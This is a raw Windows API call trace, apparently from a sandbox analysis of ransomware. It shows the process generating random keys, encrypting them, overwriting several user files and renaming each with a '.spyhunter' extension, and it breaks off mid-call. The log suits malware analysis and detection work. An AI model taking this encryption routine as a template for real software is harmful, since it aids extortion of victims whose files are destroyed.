[0140.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.039] GetProcessHeap () returned 0x2c0000 [0140.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.039] GetProcessHeap () returned 0x2c0000 [0140.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61c48 | out: hHeap=0x2c0000) returned 1 [0140.039] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0c0 | out: pbBuffer=0x270f0c0) returned 1 [0140.039] GetProcessHeap () returned 0x2c0000 [0140.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0b8*=0x30) returned 1 [0140.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.040] GetProcessHeap () returned 0x2c0000 [0140.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.040] GetProcessHeap () returned 0x2c0000 [0140.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61b40 | out: hHeap=0x2c0000) returned 1 [0140.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0b8 | out: pbBuffer=0x270f0b8) returned 1 [0140.041] GetProcessHeap () returned 0x2c0000 [0140.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0b0*=0x30) returned 1 [0140.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0140.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0140.042] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".txt") returned 0x0 [0140.042] GetProcessHeap () returned 0x2c0000 [0140.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0140.042] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f074, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f074*=0x110, lpOverlapped=0x0) returned 1 [0140.043] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.043] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x270f074, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f074*=0x110, lpOverlapped=0x0) returned 1 [0140.043] GetProcessHeap () returned 0x2c0000 [0140.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0140.043] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.043] WriteFile (in: hFile=0x158, lpBuffer=0x270f0b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f074, lpOverlapped=0x0 | out: lpBuffer=0x270f0b4*, lpNumberOfBytesWritten=0x270f074*=0x4, lpOverlapped=0x0) returned 1 [0140.043] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f074, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f074*=0x30, lpOverlapped=0x0) returned 1 [0140.043] CloseHandle (hObject=0x158) returned 1 [0140.044] GetProcessHeap () returned 0x2c0000 [0140.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.044] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.spyhunter") returned 120 [0140.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.spyhunter")) returned 1 [0140.045] GetProcessHeap () returned 0x2c0000 [0140.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.045] GetProcessHeap () returned 0x2c0000 [0140.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.045] GetProcessHeap () returned 0x2c0000 [0140.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0d08 | out: hHeap=0x2c0000) returned 1 [0140.048] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0a8 | out: pbBuffer=0x270f0a8) returned 1 [0140.049] GetProcessHeap () returned 0x2c0000 [0140.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.049] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0a0*=0x30) returned 1 [0140.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0140.108] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0140.108] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".txt") returned 0x0 [0140.108] GetProcessHeap () returned 0x2c0000 [0140.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0140.108] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f064*=0x60b, lpOverlapped=0x0) returned 1 [0140.216] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.216] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f064*=0x60b, lpOverlapped=0x0) returned 1 [0140.216] GetProcessHeap () returned 0x2c0000 [0140.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0140.216] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.217] WriteFile (in: hFile=0x158, lpBuffer=0x270f0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x270f0a4*, lpNumberOfBytesWritten=0x270f064*=0x4, lpOverlapped=0x0) returned 1 [0140.217] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f064*=0x30, lpOverlapped=0x0) returned 1 [0140.217] CloseHandle (hObject=0x158) returned 1 [0140.217] GetProcessHeap () returned 0x2c0000 [0140.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.217] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.spyhunter") returned 145 [0140.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.spyhunter")) returned 1 [0140.219] GetProcessHeap () returned 0x2c0000 [0140.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.219] GetProcessHeap () returned 0x2c0000 [0140.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.219] GetProcessHeap () returned 0x2c0000 [0140.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5158 | out: hHeap=0x2c0000) returned 1 [0140.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0a8 | out: pbBuffer=0x270f0a8) returned 1 [0140.219] GetProcessHeap () returned 0x2c0000 [0140.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.219] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0a0*=0x30) returned 1 [0140.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0140.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0140.221] StrStrW (lpFirst="Outlook.srs", lpSrch=".txt") returned 0x0 [0140.221] GetProcessHeap () returned 0x2c0000 [0140.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0140.221] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f064*=0xa00, lpOverlapped=0x0) returned 1 [0140.385] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.385] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f064*=0xa00, lpOverlapped=0x0) returned 1 [0140.386] GetProcessHeap () returned 0x2c0000 [0140.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0140.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.386] WriteFile (in: hFile=0x158, lpBuffer=0x270f0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x270f0a4*, lpNumberOfBytesWritten=0x270f064*=0x4, lpOverlapped=0x0) returned 1 [0140.386] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f064, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f064*=0x30, lpOverlapped=0x0) returned 1 [0140.386] CloseHandle (hObject=0x158) returned 1 [0140.386] GetProcessHeap () returned 0x2c0000 [0140.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.386] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.spyhunter") returned 89 [0140.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.spyhunter")) returned 1 [0140.415] GetProcessHeap () returned 0x2c0000 [0140.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.415] GetProcessHeap () returned 0x2c0000 [0140.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.415] GetProcessHeap () returned 0x2c0000 [0140.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f130 | out: hHeap=0x2c0000) returned 1 [0140.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0a0 | out: pbBuffer=0x270f0a0) returned 1 [0140.415] GetProcessHeap () returned 0x2c0000 [0140.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f098*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f098*=0x30) returned 1 [0140.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0140.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0140.416] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0140.416] GetProcessHeap () returned 0x2c0000 [0140.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0140.416] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f05c*=0xdd, lpOverlapped=0x0) returned 1 [0140.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.417] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x270f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f05c*=0xdd, lpOverlapped=0x0) returned 1 [0140.417] GetProcessHeap () returned 0x2c0000 [0140.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0140.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.417] WriteFile (in: hFile=0x158, lpBuffer=0x270f09c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f05c, lpOverlapped=0x0 | out: lpBuffer=0x270f09c*, lpNumberOfBytesWritten=0x270f05c*=0x4, lpOverlapped=0x0) returned 1 [0140.417] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f05c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f05c*=0x30, lpOverlapped=0x0) returned 1 [0140.417] CloseHandle (hObject=0x158) returned 1 [0140.418] GetProcessHeap () returned 0x2c0000 [0140.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.418] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.spyhunter") returned 112 [0140.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.spyhunter")) returned 1 [0140.419] GetProcessHeap () returned 0x2c0000 [0140.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.419] GetProcessHeap () returned 0x2c0000 [0140.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.419] GetProcessHeap () returned 0x2c0000 [0140.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67ef8 | out: hHeap=0x2c0000) returned 1 [0140.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0a0 | out: pbBuffer=0x270f0a0) returned 1 [0140.419] GetProcessHeap () returned 0x2c0000 [0140.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.420] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f098*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f098*=0x30) returned 1 [0140.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.420] GetProcessHeap () returned 0x2c0000 [0140.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.420] GetProcessHeap () returned 0x2c0000 [0140.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61a38 | out: hHeap=0x2c0000) returned 1 [0140.420] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f098 | out: pbBuffer=0x270f098) returned 1 [0140.420] GetProcessHeap () returned 0x2c0000 [0140.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.420] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f090*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f090*=0x30) returned 1 [0140.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.420] GetProcessHeap () returned 0x2c0000 [0140.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.420] GetProcessHeap () returned 0x2c0000 [0140.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61930 | out: hHeap=0x2c0000) returned 1 [0140.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f078 | out: pbBuffer=0x270f078) returned 1 [0140.675] GetProcessHeap () returned 0x2c0000 [0140.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f070*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f070*=0x30) returned 1 [0140.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.676] GetProcessHeap () returned 0x2c0000 [0140.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.676] GetProcessHeap () returned 0x2c0000 [0140.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85de8 | out: hHeap=0x2c0000) returned 1 [0140.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f078 | out: pbBuffer=0x270f078) returned 1 [0140.676] GetProcessHeap () returned 0x2c0000 [0140.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.676] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f070*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f070*=0x30) returned 1 [0140.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.676] GetProcessHeap () returned 0x2c0000 [0140.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.676] GetProcessHeap () returned 0x2c0000 [0140.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85d20 | out: hHeap=0x2c0000) returned 1 [0140.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f070 | out: pbBuffer=0x270f070) returned 1 [0140.677] GetProcessHeap () returned 0x2c0000 [0140.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f068*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f068*=0x30) returned 1 [0140.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MCXTTK4kzfHa12KoL1P.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mcxttk4kzfha12kol1p.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.677] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MCXTTK4kzfHa12KoL1P.wav") returned 73 [0140.677] StrStrW (lpFirst="MCXTTK4kzfHa12KoL1P.wav", lpSrch=".txt") returned 0x0 [0140.677] GetProcessHeap () returned 0x2c0000 [0140.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.678] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f02c, lpOverlapped=0x0 | out: 